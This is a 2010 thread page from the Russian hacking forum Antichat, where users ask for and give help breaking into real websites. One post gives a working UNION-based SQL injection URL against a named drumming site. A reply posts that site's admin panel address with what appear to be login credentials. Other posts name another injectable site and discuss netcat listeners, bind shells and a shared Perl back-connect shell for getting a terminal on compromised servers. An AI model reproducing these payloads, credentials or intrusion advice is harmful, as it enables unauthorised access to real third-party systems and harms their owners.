HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 1458 из 2438 « Первая < 458958135814081448 1454 1455 1456 1457 1458 1459 1460 1461 1462 1468150815581958 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #14571  
Старый 31.07.2010, 18:19
[Feldmarschall]
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388

Репутация: 87
По умолчанию
Цитата:
Сообщение от hotice  
hotice said:
как можно придать этот сайт
тебе не как..
 
Ответить с цитированием

  #14572  
Старый 31.07.2010, 18:42
IceJOKER
Новичок
Регистрация: 19.03.2010
Сообщений: 0
Провел на форуме:
11978

Репутация: 0
По умолчанию
Нашел SQL inj, но никак не смог вытащит что-то. Кто поможет? Читал темы тут, но никак не смог. В ГЕТ параметре не фильтруется ид.

Еще, нашел на несколькиx сайтаx раскрытие путей, а что можно сними сделать?

И как найти php inclue ?

Подробно объясните,please...
 
Ответить с цитированием

  #14573  
Старый 31.07.2010, 19:01
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию
Цитата:
Сообщение от IceJOKER  
IceJOKER said:
Нашел SQL inj, но никак не смог вытащит что-то. Кто поможет? Читал темы тут, но никак не смог. В ГЕТ параметре не фильтруется ид.
Еще, нашел на несколькиx сайтаx раскрытие путей, а что можно сними сделать?
И как найти php inclue ?
Подробно объясните,please...
тынц
 
Ответить с цитированием

  #14574  
Старый 31.07.2010, 19:39
IceJOKER
Новичок
Регистрация: 19.03.2010
Сообщений: 0
Провел на форуме:
11978

Репутация: 0
По умолчанию
ТЫНЦ не помогло, вот сайт где скул inj. http://dag-auto.ru/userauto.php?PHPSESSID=LALALA&start=1blabla
 
Ответить с цитированием

  #14575  
Старый 31.07.2010, 22:33
IMMORTAL_S
Новичок
Регистрация: 29.04.2010
Сообщений: 19
Провел на форуме:
58603

Репутация: 3
По умолчанию
Пытаюсь на сервере прослушать порт netcat'ом, но ничё не получается оО... выдает:

Код:
Code:
> nc -l -p 31337
usage: nc [-46DdhklnrStUuvzC] [-i interval] [-p source_port]
	  [-s source_ip_address] [-T ToS] [-w timeout] [-X proxy_version]
	  [-x proxy_address[:port]] [hostname] [port[s]]
Хотя я и могу запустить бинд на перле, но хочу понять как это сделать netcat'ом.
 
Ответить с цитированием

  #14576  
Старый 31.07.2010, 22:58
IMMORTAL_S
Новичок
Регистрация: 29.04.2010
Сообщений: 19
Провел на форуме:
58603

Репутация: 3
По умолчанию
Еще вопрос:

Соединяюсь с сервером чз netcat, потом ввожу команду ssh 123.123.123.123, в ответ приходит следующая надпись

Код:
Code:
Pseudo-terminal will not be allocated because stdin is not a terminal
Что есть этот самый терминал..? где можно почитать про это?
 
Ответить с цитированием

  #14577  
Старый 01.08.2010, 11:36
kfor
Участник форума
Регистрация: 01.09.2005
Сообщений: 194
Провел на форуме:
818095

Репутация: 34
Отправить сообщение для kfor с помощью ICQ
По умолчанию
Цитата:
Сообщение от IMMORTAL_S  
IMMORTAL_S said:
Еще вопрос:
Соединяюсь с сервером чз netcat, потом ввожу команду ssh 123.123.123.123, в ответ приходит следующая надпись
Код:
Code:
Pseudo-terminal will not be allocated because stdin is not a terminal
Что есть этот самый
терминал
..? где можно почитать про это?
Это означает, что тебе нужен бекконект который привязывется к терминалу. Вот держи залил тебе на перле http://www.sendspace.com/file/tsb30y
 
Ответить с цитированием

  #14578  
Старый 01.08.2010, 15:54
IMMORTAL_S
Новичок
Регистрация: 29.04.2010
Сообщений: 19
Провел на форуме:
58603

Репутация: 3
По умолчанию
Как им правильно пользоваться?

Выдает:

Код:
Code:
ERROR: No more pty's avaliable
P.S. Может у кого есть ttyX, что-то нигде не нашел.
 
Ответить с цитированием

  #14579  
Старый 01.08.2010, 21:14
Electr0n
Познающий
Регистрация: 19.08.2009
Сообщений: 68
Провел на форуме:
2159875

Репутация: 446
Отправить сообщение для Electr0n с помощью ICQ
По умолчанию
информация о табицах не доступна...

возможен просмотр?

Код:
Code:
http://www.drummersworld.com/dsp/category.php?id=e90a535886a467144e56b47de5e563b3&catname=Cymbals&catid=-147+union+select+1,2,3,4,5,6,7,8,9,10,database(),12,13,14,15,16,17,18,19,20,21,22--
 
Ответить с цитированием

  #14580  
Старый 01.08.2010, 21:27
AKYLA
Участник форума
Регистрация: 29.11.2007
Сообщений: 116
Провел на форуме:
283596

Репутация: 88
По умолчанию
Electr0n там видимо фильтр на выуживание таблиц, потому что если методом подбора подобрать допустим таблицу users, то поля можно свободно получить, без брута

Вот тебе админка:

http://www.drummersworld.com/dsp/admin/admin.php

technology

fuckwhohackthisshop
 
Ответить с цитированием
Ответ
Страница 1458 из 2438 « Первая < 458958135814081448 1454 1455 1456 1457 1458 1459 1460 1461 1462 1468150815581958 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ